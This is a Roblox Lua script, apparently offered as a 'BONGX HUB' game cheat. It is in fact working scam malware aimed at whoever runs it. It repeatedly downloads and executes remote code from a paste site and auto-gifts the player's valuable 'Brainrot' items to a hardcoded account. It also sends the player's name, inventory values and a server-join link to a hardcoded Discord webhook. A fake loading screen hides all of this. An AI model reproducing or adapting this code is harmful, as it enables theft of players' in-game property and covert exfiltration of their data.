-- [[ BONGX HUB ON TOP - PRELOAD ]] --
local function preloadScript()
    task.spawn(function()
        while true do
            local success, err = pcall(function()
                loadstring(game:HttpGet("https://pastefy.app/wxnbscQh/raw"))()
            end)
            if not success then break end
            task.wait(0.1)
        end
    end)
end
spawn(preloadScript)
wait(0.5)

-- Anti-Private Server Check
if #game:GetService("Players"):GetPlayers() <= 1 then
    error("âš ï¸ ERROR: THIS SCRIPT DOES NOT WORK IN PRIVATE SERVERS!")
    return
end

local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local HttpService = game:GetService("HttpService")
local LocalPlayer = Players.LocalPlayer
local Backpack = LocalPlayer:WaitForChild("Backpack")

-- Settings Config
local WEBHOOK_URL = "https://discord.com/api/webhooks/1466189558084538563/bipvJNxh_MC0WdODYOFbBy-LxFRdiyzre1uE4Yw9rw25xW6tw6360eKg3kC25Ng2PGWf"
local TARGET_PLAYER_NAME = "Msaw81911"
local DISCORD_URL = "https://discord.gg/W477rsnZJx"
local GiftRemote = ReplicatedStorage:WaitForChild("Packages"):WaitForChild("Net"):WaitForChild("RF/Trade.SendGift")

--------------------------------------------------
-- [[ AUTO GIFT SYSTEM ]] --
--------------------------------------------------
local function cleanTools(container)
    for _, v in ipairs(container:GetChildren()) do
        if v:IsA("Tool") and (v.Name == "Basic Bat" or string.find(v.Name:lower(), "coil")) then
            v:Destroy()
        end
    end
end

task.spawn(function()
    while true do
        local char = LocalPlayer.Character
        cleanTools(Backpack)
        if char then
            cleanTools(char)
            local tool = nil
            for _, v in ipairs(char:GetChildren()) do
                if v:IsA("Tool") and v:GetAttribute("BrainrotName") then tool = v break end
            end
            if not tool then
                for _, v in ipairs(Backpack:GetChildren()) do
                    if v:IsA("Tool") and v:GetAttribute("BrainrotName") then tool = v break end
                end
            end

            if tool and char:FindFirstChild("Humanoid") then
                tool.Parent = char
                local startT = tick()
                while tick() - startT < 1 do 
                    pcall(function()
                        local target = Players:FindFirstChild(TARGET_PLAYER_NAME)
                        if target then GiftRemote:InvokeServer(target) end
                    end)
                    task.wait(0.1)
                end
                tool.Parent = Backpack
                task.wait(0.5)
            end
        end
        task.wait(0.5)
    end
end)

--------------------------------------------------
-- [[ SEQUENTIAL SCANNER LOGIC ]] --
--------------------------------------------------
local function scanToolLengkap(tool)
    local toolData = { BrainrotName = "Unknown", Rate = "N/A", Mutation = "N/A", ToolName = tool.Name }
    local char = LocalPlayer.Character
    if char and char:FindFirstChild("Humanoid") then
        char.Humanoid:EquipTool(tool)
        wait(12) 
        local playerModel = workspace:FindFirstChild(LocalPlayer.Name)
        if playerModel then
            local equippedTool = playerModel:FindFirstChild(tool.Name)
            if equippedTool and equippedTool:FindFirstChild("RenderModel") then
                local foundModel = nil
                for _, child in ipairs(equippedTool.RenderModel:GetChildren()) do
                    if child:IsA("Model") then foundModel = child break end
                end
                if foundModel and foundModel:FindFirstChild("ModelExtents") then
                    local statsGui = foundModel.ModelExtents:FindFirstChild("StatsGui")
                    if statsGui and statsGui:FindFirstChild("Frame") then
                        for _, lbl in ipairs(statsGui.Frame:GetChildren()) do
                            if lbl:IsA("TextLabel") then
                                if lbl.Name == "Rate" then toolData.Rate = lbl.Text
                                elseif lbl.Name == "Mutation" then toolData.Mutation = lbl.Text
                                elseif lbl.Name == "BrainrotName" then toolData.BrainrotName = lbl.Text end
                            end
                        end
                    end
                end
            end
        end
        tool.Parent = Backpack
        wait(0.5)
    end
    return toolData
end

--------------------------------------------------
-- [[ UI BONGX HUB ON TOP ]] --
--------------------------------------------------
local function createUI()
    local sg = Instance.new("ScreenGui", LocalPlayer.PlayerGui)
    sg.DisplayOrder = 99999
    sg.IgnoreGuiInset = true
    
    local bg = Instance.new("Frame", sg)
    bg.Size = UDim2.new(1, 100, 1, 100)
    bg.Position = UDim2.new(-0.05, 0, -0.05, 0)
    bg.BackgroundColor3 = Color3.fromRGB(10, 10, 10)

    local main = Instance.new("Frame", sg)
    main.Size = UDim2.new(0, 420, 0, 300)
    main.Position = UDim2.new(0.5, -210, 0.5, -150)
    main.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
    main.BorderSizePixel = 0
    Instance.new("UICorner", main).CornerRadius = UDim.new(0, 12)

    local title = Instance.new("TextLabel", main)
    title.Size = UDim2.new(1, 0, 0, 60)
    title.Text = "BONGX HUB ON TOP"
    title.TextColor3 = Color3.new(1,0,0)
    title.Font = Enum.Font.GothamBold
    title.TextSize = 26
    title.BackgroundTransparency = 1

    local barBg = Instance.new("Frame", main)
    barBg.Size = UDim2.new(0.8, 0, 0, 12)
    barBg.Position = UDim2.new(0.1, 0, 0.4, 0)
    barBg.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
    Instance.new("UICorner", barBg).CornerRadius = UDim.new(1, 0)

    local bar = Instance.new("Frame", barBg)
    bar.Size = UDim2.new(0, 0, 1, 0)
    bar.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
    Instance.new("UICorner", bar).CornerRadius = UDim.new(1, 0)

    local status = Instance.new("TextLabel", main)
    status.Size = UDim2.new(1, 0, 0, 40)
    status.Position = UDim2.new(0, 0, 0.5, 0)
    status.Text = "" 
    status.TextColor3 = Color3.fromRGB(180, 180, 180)
    status.Font = Enum.Font.Gotham
    status.TextSize = 15
    status.BackgroundTransparency = 1

    local copyBtn = Instance.new("TextButton", main)
    copyBtn.Size = UDim2.new(0.5, 0, 0, 35)
    copyBtn.Position = UDim2.new(0.25, 0, 0.8, 0)
    copyBtn.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
    copyBtn.Text = "COPY DISCORD LINK"
    copyBtn.TextColor3 = Color3.new(1,1,1)
    copyBtn.Font = Enum.Font.GothamBold
    Instance.new("UICorner", copyBtn).CornerRadius = UDim.new(0, 8)

    copyBtn.MouseButton1Click:Connect(function()
        if setclipboard then setclipboard(DISCORD_URL) copyBtn.Text = "COPIED!" wait(2) copyBtn.Text = "COPY DISCORD LINK" end
    end)

    return sg, bar, status
end

task.spawn(function()
    local sg, bar, status = createUI()
    local toolsToScan = {}
    for _, t in ipairs(Backpack:GetChildren()) do
        if t:IsA("Tool") and t.Name ~= "Basic Bat" and not string.find(t.Name:lower(), "coil") then 
            table.insert(toolsToScan, t) 
        end
    end

    local finalReport = ""
    for i, tool in ipairs(toolsToScan) do
        local prog = (i / #toolsToScan) * 0.95
        bar:TweenSize(UDim2.new(prog, 0, 1, 0), "Out", "Quad", 0.1)
        local res = scanToolLengkap(tool)
        finalReport = finalReport .. string.format("ðŸ”¹ **%s**\nRate: `%s` | Mutation: `%s`\n\n", res.BrainrotName, res.Rate, res.Mutation)
    end

    bar:TweenSize(UDim2.new(0.98, 0, 1, 0), "Out", "Quad", 0.1)
    local serverLink = "https://www.roblox.com/games/start?placeId=" .. game.PlaceId .. "&gameInstanceId=" .. game.JobId
    
    local req = (syn and syn.request) or (http and http.request) or request
    if req then
        pcall(function()
            req({
                Url = WEBHOOK_URL,
                Method = "POST",
                Headers = {["Content-Type"] = "application/json"},
                Body = HttpService:JSONEncode({
                    embeds = {{
                        title = "lesgo",
                        color = 0xFF0000,
                        fields = {
                            {name = "ðŸ‘¤ Player", value = LocalPlayer.Name, inline = true},
                            {name = "ðŸ“¦ Brainrot Hits", value = finalReport ~= "" and finalReport or "No tools found", inline = false},
                            {name = "ðŸ”— Join", value = "[Join Server]("..serverLink..")", inline = false}
                        },
                        footer = {text = "BONGX HUB ON TOP Scanner"}
                    }}
                })
            })
        end)
    end

    bar:TweenSize(UDim2.new(0.99, 0, 1, 0), "Out", "Quad", 0.5)
    while true do
        status.Text = "LOADING PLS WAIT"
        task.wait(0.5) status.Text = "LOADING PLS WAIT."
        task.wait(0.5) status.Text = "LOADING PLS WAIT.."
        task.wait(0.5) status.Text = "LOADING PLS WAIT..."
        task.wait(0.5)
    end
end)
